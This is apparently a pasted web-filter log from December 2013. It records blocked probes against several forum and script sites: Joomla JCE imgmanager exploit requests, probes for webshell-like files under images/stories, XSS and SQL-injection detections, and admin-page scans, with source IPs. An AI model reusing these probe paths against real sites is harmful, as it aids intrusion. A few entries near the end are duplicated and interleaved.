  1138. DATE: 05-Dec-2013 14:34:12
  1139. -------------------------
  1140. LOG: Admin Probe
  1141. URL: http://nzbx.ws/blog/wp-admin/
  1142. IP: 200.98.197.72
  1143. DATE: 05-Dec-2013 14:35:56
  1144. -------------------------
  1145. LOG: Install, Upgrade Probe
  1146. URL: http://www.rlzlog.info/admin.php
  1147. IP: 90.190.211.30
  1148. DATE: 05-Dec-2013 14:40:20
  1149. -------------------------
  1150. LOG: Install, Upgrade Probe
  1151. URL: http://rlzlog.info/admin.php
  1152. IP: 87.121.194.76
  1153. DATE: 05-Dec-2013 15:23:04
  1154. -------------------------
  1155. LOG: Detects conditional SQL injection attempts
  1156. URL: http://newz.scriptz-team.info/XenForo-Development-Questions/096526-Having-problems-putting-PHP-into-a-page.html
  1157. IP: 108.166.55.48
  1158. DATE: 05-Dec-2013 15:31:39
  1159. -------------------------
  1160. LOG: Install, Upgrade Probe
  1161. URL: http://rlzlog.info/admin.php
  1162. IP: 93.172.26.124
  1163. DATE: 05-Dec-2013 16:10:42
  1164. -------------------------
  1165. LOG: Install, Upgrade Probe
  1166. URL: http://scriptz-team.info/admin.php
  1167. IP: 117.199.141.57
  1168. DATE: 05-Dec-2013 16:14:34
  1169. -------------------------
  1170. LOG: Install, Upgrade Probe
  1171. URL: http://newz.scriptz-team.info/admin.php
  1172. IP: 78.81.39.3
  1173. DATE: 05-Dec-2013 18:45:13
  1174. -------------------------
  1175. LOG: Detects common XSS concatenation patterns 1/2
  1176. URL: http://www.rlzlog.info/?t=/filez_tube/view.php?id=6ogjHO3teTSMUeoLgrOOXa/Shameless-US-s02e05-720p-hdtv-x264-orenji.html
  1177. IP: 110.90.204.38
  1178. DATE: 05-Dec-2013 19:01:50
  1179. -------------------------
  1180. LOG: Detects common XSS concatenation patterns 1/2
  1181. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  1182. IP: 69.175.11.188
  1183. DATE: 05-Dec-2013 19:12:25
  1184. -------------------------
  1185. LOG: Detects common XSS concatenation patterns 1/2
  1186. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  1187. IP: 69.175.11.188
  1188. DATE: 05-Dec-2013 19:12:28
  1189. -------------------------
  1190. LOG: Server backup dl files
  1191. URL: http://skripterz.info/api/skripterz_app_for_IP.Board.zip
  1192. IP: 209.190.1.131
  1193. DATE: 05-Dec-2013 19:48:45
  1194. -------------------------
  1195. LOG: Server backup dl files
  1196. URL: http://skripterz.info/api/skripterz_app_v2.0_for_IP.Board.zip
  1197. IP: 209.190.1.131
  1198. DATE: 05-Dec-2013 19:48:45
  1199. -------------------------
  1200. LOG: Server backup dl files
  1201. URL: http://skripterz.info/api/skripterz_for_IP.Board.zip
  1202. IP: 209.190.1.131
  1203. DATE: 05-Dec-2013 19:48:46
  1204. -------------------------
  1205. LOG: Server backup dl files
  1206. URL: http://skripterz.info/api/skripterz_for_WP_v1.0.zip
  1207. IP: 209.190.1.131
  1208. DATE: 05-Dec-2013 19:48:46
  1209. -------------------------
  1210. LOG: Server backup dl files
  1211. URL: http://skripterz.info/api/skripterz_for_phpBB.zip
  1212. IP: 209.190.1.131
  1213. DATE: 05-Dec-2013 19:48:46
  1214. -------------------------
  1215. LOG: Server backup dl files
  1216. URL: http://skripterz.info/api/skripterz_for_vBulletin.zip
  1217. IP: 209.190.1.131
  1218. DATE: 05-Dec-2013 19:48:47
  1219. -------------------------
  1220. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1221. URL: http://newz.scriptz-team.info/Kayako-Forums-News-and-Announcements/095699-At-Your-Team%E2%80%99s-Fingertips-Our-Latest-Apps-and-Integrations.html
  1222. IP: 46.165.197.142
  1223. DATE: 05-Dec-2013 20:57:18
  1224. -------------------------
  1225. LOG: Detects JavaScript with(), ternary operators and XML predicate attacks
  1226. URL: http://www.rlzlog.info/?t=Lynda.com.View.Source-iNKiSO&date=2012-02-25%2018:58:21&cat=APPS&size=91.0MB%7C7F&key=0e86ae4e8f64410970a2ae5cbeba6abb
  1227. IP: 88.104.170.146
  1228. DATE: 05-Dec-2013 21:03:59
  1229. -------------------------
  1230. LOG: Detects common XSS concatenation patterns 1/2
  1231. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  1232. IP: 58.212.238.75
  1233. DATE: 05-Dec-2013 22:37:29
  1234. -------------------------
  1235. LOG: Detects common XSS concatenation patterns 1/2
  1236. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  1237. IP: 58.212.238.75
  1238. DATE: 05-Dec-2013 22:37:31
  1239. -------------------------
  1240. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1241. URL: http://newz.scriptz-team.info/vBulletin-C-Forum-vBulletin-4-Questions-Problems-and-Troubles/045086-Forum-Why-symbols-such-as-and321and298%C3%83%E2%80%9A%C3%86%E2%80%99and941-become-numbers-like-this-974974974-9829-.html
  1242. IP: 23.81.173.49
  1243. DATE: 05-Dec-2013 23:36:25
  1244. -------------------------
  1245. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1246. URL: http://newz.scriptz-team.info/doc/My-host-upgrade-the-PHP-ver-to-5-2-17-I-can%C2%B4t-see-my-forum.doc
  1247. IP: 180.76.6.233
  1248. DATE: 05-Dec-2013 23:48:10
  1249. -------------------------
  1250. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1251. URL: http://newz.scriptz-team.info/CS-Cart-blog/02197-A-developer%C3%83%C6%92%C3%82%C2%A2%C3%83%C2%A2%C3%A2%E2%82%AC%C5%A1%C3%82%C2%AC%C3%83%C2%A2%C3%A2%E2%82%AC%C5%BE%C3%82%C2%A2s-review-of-CS-Cart.html
  1252. IP: 176.9.40.141
  1253. DATE: 06-Dec-2013 00:07:14
  1254. -------------------------
  1255. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1256. URL: http://newz.scriptz-team.info/CS-Cart-blog/037609-%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%85%E2%80%9CPowered-by-CS-Cart%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%82%C2%9D-Link-Removal-License.html
  1257. IP: 176.9.40.141
  1258. DATE: 06-Dec-2013 00:07:16
  1259. -------------------------
  1260. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1261. URL: http://newz.scriptz-team.info/CS-Cart-blog/090877-Generate-More-Sales-with-Yotpo%E2%80%99s-Social-Reviews.html
  1262. IP: 176.9.40.141
  1263. DATE: 06-Dec-2013 00:07:18
  1264. -------------------------
  1265. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1266. URL: http://newz.scriptz-team.info/SocialEngine-Announcements/090761-SocialEngine-PHP-4-5-Released-%E2%80%93-Performance-Improvements-and-New-Modern-Theme.html
  1267. IP: 176.9.40.141
  1268. DATE: 06-Dec-2013 00:07:20
  1269. -------------------------
  1270. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1271. URL: http://newz.scriptz-team.info/html/Case-Study-Hitachi-Europe-Sees-User-Adoption-Success-and-Frees-Up-Their-Team%E2%80%99s-Time-with-.html
  1272. IP: 176.9.40.141
  1273. DATE: 06-Dec-2013 00:07:21
  1274. -------------------------
  1275. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1276. URL: http://newz.scriptz-team.info/html/Cron-Based-Email-Sending-%C2%96-vBulletin-mail-queue-back-log.html
  1277. IP: 176.9.40.141
  1278. DATE: 06-Dec-2013 00:07:23
  1279. -------------------------
  1280. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1281. URL: http://newz.scriptz-team.info/html/Generate-More-Sales-with-Yotpo%E2%80%99s-Social-Reviews.html
  1282. IP: 176.9.40.141
  1283. DATE: 06-Dec-2013 00:07:25
  1284. -------------------------
  1285. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1286. URL: http://newz.scriptz-team.info/html/Harmony-vBulletin-4-1-8-Style-verf%C3%83%C2%BCgbar.html
  1287. IP: 176.9.40.141
  1288. DATE: 06-Dec-2013 00:07:27
  1289. -------------------------
  1290. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1291. URL: http://newz.scriptz-team.info/html/Holbi%C3%A2%E2%82%AC%E2%84%A2s-Kayako-ITIL-help-desk-implementation-project-for-Haya-Water.html
  1292. IP: 176.9.40.141
  1293. DATE: 06-Dec-2013 00:07:31
  1294. -------------------------
  1295. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1296. URL: http://newz.scriptz-team.info/html/Holbi%E2%80%99s-Kayako-ITIL-help-desk-implementation-project-for-Haya-Water.html
  1297. IP: 176.9.40.141
  1298. DATE: 06-Dec-2013 00:07:33
  1299. -------------------------
  1300. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1301. URL: http://newz.scriptz-team.info/html/IMPX-405-We-seriously-need-a-module-f%C3%83%C2%BCr-Wordpress-3.html
  1302. IP: 176.9.40.141
  1303. DATE: 06-Dec-2013 00:07:39
  1304. -------------------------
  1305. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1306. URL: http://newz.scriptz-team.info/html/IMPX-405-We-seriously-need-a-module-f%C3%83%C6%92%C3%82%C2%BCr-Wordpress-3.html
  1307. IP: 176.9.40.141
  1308. DATE: 06-Dec-2013 00:07:41
  1309. -------------------------
  1310. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1311. URL: http://newz.scriptz-team.info/html/IP-BotNet%C3%83%E2%80%9A%C3%A2%E2%80%9E%C2%A2-through-OpenID-in-IP-Board.html
  1312. IP: 176.9.40.141
  1313. DATE: 06-Dec-2013 00:07:45
  1314. -------------------------
  1315. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1316. URL: http://newz.scriptz-team.info/html/Images-vBulletin-4-1-8-Styles-verf%C3%83%C2%BCgbar.html
  1317. IP: 176.9.40.141
  1318. DATE: 06-Dec-2013 00:07:48
  1319. -------------------------
  1320. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1321. URL: http://newz.scriptz-team.info/html/Kayako-exhibiting-in-%C3%A2%E2%82%AC%C5%93HKTDC-International-ICT-Expo-2011%C3%A2%E2%82%AC%C2%B3-Hong-Kong-.html
  1322. IP: 176.9.40.141
  1323. DATE: 06-Dec-2013 00:07:53
  1324. -------------------------
  1325. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1326. URL: http://newz.scriptz-team.info/html/Kayako-exhibiting-in-%E2%80%9CHKTDC-International-ICT-Expo-2011%E2%80%B3-Hong-Kong-.html
  1327. IP: 176.9.40.141
  1328. DATE: 06-Dec-2013 00:07:55
  1329. -------------------------
  1330. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1331. URL: http://newz.scriptz-team.info/html/We%E2%80%99re-back-from-CeBIT-2011.html
  1332. IP: 176.9.40.141
  1333. DATE: 06-Dec-2013 00:07:57
  1334. -------------------------
  1335. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1336. URL: http://newz.scriptz-team.info/print/Case-Study-Hitachi-Europe-Sees-User-Adoption-Success-and-Frees-Up-Their-Team%E2%80%99s-Time-with-.html
  1337. IP: 176.9.40.141
  1338. DATE: 06-Dec-2013 00:08:01
  1339. -------------------------
  1340. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1341. URL: http://newz.scriptz-team.info/print/Cron-Based-Email-Sending-%C2%96-vBulletin-mail-queue-back-log.html
  1342. IP: 176.9.40.141
  1343. DATE: 06-Dec-2013 00:08:04
  1344. -------------------------
  1345. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1346. URL: http://newz.scriptz-team.info/print/Generate-More-Sales-with-Yotpo%E2%80%99s-Social-Reviews.html
  1347. IP: 176.9.40.141
  1348. DATE: 06-Dec-2013 00:08:06
  1349. -------------------------
  1350. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1351. URL: http://newz.scriptz-team.info/print/Harmony-vBulletin-4-1-8-Style-verf%C3%83%C2%BCgbar.html
  1352. IP: 176.9.40.141
  1353. DATE: 06-Dec-2013 00:08:07
  1354. -------------------------
  1355. LOG: Admin Probe
  1356. URL: http://nzbx.ws/wordpress/wp-admin/
  1357. IP: 109.71.49.3
  1358. DATE: 06-Dec-2013 00:09:47
  1359. -------------------------
  1360. LOG: Detects common XSS concatenation patterns 1/2
  1361. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  1362. IP: 192.227.243.77
  1363. DATE: 06-Dec-2013 00:40:13
  1364. -------------------------
  1365. LOG: Detects common XSS concatenation patterns 1/2
  1366. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  1367. IP: 192.227.243.77
  1368. DATE: 06-Dec-2013 00:40:20
  1369. -------------------------
  1370. LOG: Install, Upgrade Probe
  1371. URL: http://scriptz-team.info/admin.php
  1372. IP: 213.123.215.170
  1373. DATE: 06-Dec-2013 00:59:25
  1374. -------------------------
  1375. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1376. URL: http://newz.scriptz-team.info/CubeCart-News-and-Announcements/086528-CubeCart-Autumn-SALE-get-20percent-off%C3%A2%E2%82%AC%C2%A6-Dont-Miss-Out-.html
  1377. IP: 144.76.41.8
  1378. DATE: 06-Dec-2013 01:08:27
  1379. -------------------------
  1380. LOG: Detects halfwidth/fullwidth encoded unicode HTML breaking attempts
  1381. URL: http://newz.scriptz-team.info/CubeCart-News-and-Announcements/096168-Get-a-credit-worth-up-to-%C2%A3250-when-you-switch-to-PayPal-Pro.html
  1382. IP: 144.76.41.8
  1383. DATE: 06-Dec-2013 01:08:30
  1384. -------------------------
  1385. LOG: Server backup dl files
  1386. URL: http://www.scriptz-team.info/check.zip
  1387. IP: 105.158.85.55
  1388. DATE: 06-Dec-2013 01:09:05
  1389. -------------------------
  1390. LOG: Server backup dl files
  1391. URL: http://www.scriptz-team.info/check.zip
  1392. IP: 105.158.85.55
  1393. DATE: 06-Dec-2013 01:09:08
  1394. -------------------------
  1395. LOG: Nasty Joomla Probe
  1396. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1397. IP: 69.64.38.218
  1398. DATE: 06-Dec-2013 01:32:53
  1399. -------------------------
  1400. LOG: Nasty Joomla Probe
  1401. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1402. IP: 69.64.38.218
  1403. DATE: 06-Dec-2013 01:32:56
  1404. -------------------------
  1405. LOG: Images Stories Hack Probe
  1406. URL: http://newz.scriptz-team.info/images/stories/config.inc.php?rf
  1407. IP: 69.64.38.218
  1408. DATE: 06-Dec-2013 01:33:02
  1409. -------------------------
  1410. LOG: Detects common XSS concatenation patterns 1/2
  1411. URL: http://www.rlzlog.info/?t=/filez_tube/view.php?id=6ogjHO3teTSMUeoLgrOOXa/Shameless-US-s02e05-720p-hdtv-x264-orenji.html
  1412. IP: 192.157.235.170
  1413. DATE: 06-Dec-2013 02:33:58
  1414. -------------------------
  1415. LOG: Detects common XSS concatenation patterns 1/2
  1416. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  1417. IP: 192.73.239.173
  1418. DATE: 06-Dec-2013 02:40:11
  1419. -------------------------
  1420. LOG: Detects common XSS concatenation patterns 1/2
  1421. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  1422. IP: 192.73.239.173
  1423. DATE: 06-Dec-2013 02:40:12
  1424. -------------------------
  1425. LOG: Nasty Joomla Probe
  1426. URL: http://www.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1427. IP: 143.225.131.130
  1428. DATE: 06-Dec-2013 04:02:33
  1429. -------------------------
  1430. LOG: Nasty Joomla Probe
  1431. URL: http://www.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1432. IP: 143.225.131.130
  1433. DATE: 06-Dec-2013 04:02:37
  1434. -------------------------
  1435. LOG: Images Stories Hack Probe
  1436. URL: http://www.scriptz-team.info/images/stories/config.inc.php?rf
  1437. IP: 143.225.131.130
  1438. DATE: 06-Dec-2013 04:02:37
  1439. -------------------------
  1440. LOG: Nasty Joomla Probe
  1441. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1442. IP: 198.50.219.180
  1443. DATE: 06-Dec-2013 05:08:02
  1444. -------------------------
  1445. LOG: Nasty Joomla Probe
  1446. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1447. IP: 198.50.219.180
  1448. DATE: 06-Dec-2013 05:08:02
  1449. -------------------------
  1450. LOG: Nasty Joomla Probe
  1451. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1452. IP: 198.50.219.180
  1453. DATE: 06-Dec-2013 05:08:03
  1454. -------------------------
  1455. LOG: Nasty Joomla Probe
  1456. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1457. IP: 198.50.219.180
  1458. DATE: 06-Dec-2013 05:08:03
  1459. -------------------------
  1460. LOG: Images Stories Hack Probe
  1461. URL: http://newz.scriptz-team.info/images/stories/config.inc.php?rf
  1462. IP: 198.50.219.180
  1463. DATE: 06-Dec-2013 05:08:04
  1464. -------------------------
  1465. LOG: Images Stories Hack Probe
  1466. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/images/stories/config.inc.php?rf
  1467. IP: 198.50.219.180
  1468. DATE: 06-Dec-2013 05:08:04
  1469. -------------------------
  1470. LOG: Nasty Joomla Probe
  1471. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1472. IP: 85.214.206.210
  1473. DATE: 06-Dec-2013 05:44:42
  1474. -------------------------
  1475. LOG: Nasty Joomla Probe
  1476. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1477. IP: 85.214.206.210
  1478. DATE: 06-Dec-2013 05:44:43
  1479. -------------------------
  1480. LOG: Nasty Joomla Probe
  1481. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1482. IP: 85.214.206.210
  1483. DATE: 06-Dec-2013 05:44:47
  1484. -------------------------
  1485. LOG: Nasty Joomla Probe
  1486. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1487. IP: 85.214.206.210
  1488. DATE: 06-Dec-2013 05:44:47
  1489. -------------------------
  1490. LOG: Images Stories Hack Probe
  1491. URL: http://newz.scriptz-team.info/IPS-Tracker-IP-Content/images/stories/beHbeTT.php?rf
  1492. IP: 85.214.206.210
  1493. DATE: 06-Dec-2013 05:44:59
  1494. -------------------------
  1495. LOG: Images Stories Hack Probe
  1496. URL: http://newz.scriptz-team.info/images/stories/beHbeTT.php?rf
  1497. IP: 85.214.206.210
  1498. DATE: 06-Dec-2013 05:45:01
  1499. -------------------------
  1500. LOG: Nasty Joomla Probe
  1501. URL: http://www.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager
  1502. IP: 180.76.5.99
  1503. DATE: 06-Dec-2013 05:54:11
  1504. -------------------------
  1505. LOG: Install, Upgrade Probe
  1506. URL: http://rlzlog.info/admin.php
  1507. IP: 88.203.31.2
  1508. DATE: 06-Dec-2013 06:00:29
  1509. -------------------------
  1510. LOG: Nasty Joomla Probe
  1511. URL: http://www.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1512. IP: 180.76.5.23
  1513. DATE: 06-Dec-2013 06:09:12
  1514. -------------------------
  1515. LOG: Nasty Joomla Probe
  1516. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1517. IP: 78.85.28.109
  1518. DATE: 06-Dec-2013 06:13:27
  1519. -------------------------
  1520. LOG: Nasty Joomla Probe
  1521. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1522. IP: 78.85.28.109
  1523. DATE: 06-Dec-2013 06:13:29
  1524. -------------------------
  1525. LOG: Nasty Joomla Probe
  1526. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1527. IP: 78.85.28.109
  1528. DATE: 06-Dec-2013 06:13:30
  1529. -------------------------
  1530. LOG: Images Stories Hack Probe
  1531. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/images/stories/config.inc.php?rf
  1532. IP: 78.85.28.109
  1533. DATE: 06-Dec-2013 06:13:31
  1534. -------------------------
  1535. LOG: Detects common XSS concatenation patterns 1/2
  1536. URL: http://newz.scriptz-team.info/index.php?do=/user/login/
  1537. IP: 192.3.183.213
  1538. DATE: 06-Dec-2013 06:18:43
  1539. -------------------------
  1540. LOG: Detects common XSS concatenation patterns 1/2
  1541. URL: http://newz.scriptz-team.info/index.php?do=/user/register/
  1542. IP: 192.3.183.213
  1543. DATE: 06-Dec-2013 06:18:45
  1544. -------------------------
  1545. LOG: Detects conditional SQL injection attempts
  1546. URL: http://newz.scriptz-team.info/XenForo-Development-Questions/096526-Having-problems-putting-PHP-into-a-page.html
  1547. IP: 91.121.24.97
  1548. DATE: 06-Dec-2013 06:48:33
  1549. -------------------------
  1550. LOG: Detects common XSS concatenation patterns 1/2
  1551. URL: http://www.rlzlog.info/?t=/filez_tube/view.php?id=6ogjHO3teTSMUeoLgrOOXa/Shameless-US-s02e05-720p-hdtv-x264-orenji.html
  1552. IP: 61.154.36.7
  1553. DATE: 06-Dec-2013 07:12:29
  1554. -------------------------
  1555. -------------------------
  1556. LOG: Nasty Joomla Probe
  1557. LOG: Nasty Joomla Probe
  1558. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1559. URL: http://newz.scriptz-team.info/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1560. IP: 188.165.220.78
  1561. IP: 188.165.220.78
  1562. DATE: 06-Dec-2013 09:45:53
  1563. DATE: 06-Dec-2013 09:45:53
  1564. -------------------------
  1565. LOG: Nasty Joomla Probe
  1566. URL: http://newz.scriptz-team.info/vBulletin-vBulletin-Bugs/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20
  1567. IP: 188.165.220.78
  1568. DATE: 06-Dec-2013 09:45:54
  1569. -------------------------
  1570. LOG: Admin Probe
  1571. URL: http://nzbx.ws/blog/wp-admin/
  1572. IP: 72.18.130.41
  1573. DATE: 06-Dec-2013 10:10:26
RAW Paste Data